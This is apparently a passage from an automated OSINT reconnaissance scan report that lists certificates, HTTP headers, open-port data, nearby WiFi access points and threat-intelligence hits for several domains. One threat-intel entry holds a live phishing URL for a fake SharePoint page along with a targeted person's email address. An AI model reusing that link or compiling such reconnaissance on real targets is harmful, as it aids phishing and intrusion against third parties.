d: 'FoAd4lVBdR3won9Rs2Jfak+tQjzXxPoSuo1RDbLWoBgbDtG4sbp6dJPVY2yPACeJPMILVDmGpWRL5p83JUdrP8nuVYCG+5vbYX8rd53MVZ5kJ9wlfWFmCqWwQJUw/8TZawBHID/u/30DQeOeSeUTm1hqzmleggywIwf6pMg+ibTI90WBrTuW9wSkueaL3qTaSW+A5NmE5a98IBe6uITwE7298cOlvN5xe0V0Y44L/7J794Ti/d2obzW0EWmpSj68DzdMrP78juCknmUCL5iCtrWXrfhdXXjruJCYgBsuVR5T1HoPLAY8ZaUH61xukMd5qVzPRfNIIlhcoowZA1Eh2PMRByvPcFpdrPeDKOY1J+M5l4lk4/TNmiDkgCFAka0tLoM1HisA+wo47P0wfWILTScPL+M3MhFjnCEsQgVWbbbcu7ppiHsxevxnn0ypjrb3lrjH9FQcH522PtO7okA/1k5zFXRELcMaZ1PaWlYYxUzZ0lEDuGD8W2uAABd3Zqr48isKkErgxdWRypRiannuzpfhTo9gXIVZgjYXWZqPwNgKEtOvG48uUqTLWAhuTpBS',
t: 'MTY4Mzg2MTg2MS40MTQwMDA=',
m: 'cETLdgv65AVfRnLUKPe0Cd6r3wJgEhjfW5wAN2YKd/o=',
i1: 'w+O5Ul3LVrlFQJyL4ELS5Q==',
i2: 'eUom9RfWfCbkQbM7K2vx8A==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c59d97743e3');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c59d97743e3';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpanel.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.81): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SWLFO (Net ID: 00:11:95:4C:CD:45) | 32.8608, -79.9746 |
| 2023-05-12 02:54:41 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06QWFV48ACFBYY7E5EAJW1H
Date: <REDACTED>
Content-Length: 0
| 104.196.30.220 |
| 2023-05-12 02:54:20 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz | http://nuke.battleb0t.xyz/ |
| 2023-05-12 02:46:49 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | CN=*.cloudwaysapps.com | 64.226.81.43 |
| 2023-05-12 02:54:20 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2000::/35 | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:03:33 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 008security.github.io |
| 2023-05-12 02:54:30 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 64.226.81.43 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:00:21:01) | 37.7813933,-122.3918002 |
| 2023-05-12 02:54:18 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/css;charset=utf-8 | https://pics.battleb0t.xyz/gallery.css |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.148): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet8FBA (Net ID: 00:01:36:5C:8F:B8) | 37.7813933,-122.3918002 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo8BC690 (Net ID: 00:0C:F6:8B:C6:90) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 21880a (Net ID: 00:02:2D:21:88:0A) | 37.7642, -122.3993 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | curve25519-sha256@libssh.org | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 02:52:35 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html#adeajiboye%40tfl.gov.uk', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html#adeajiboye%40tfl.gov.uk', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ff8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ff8_ConnHashTable<4088>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n 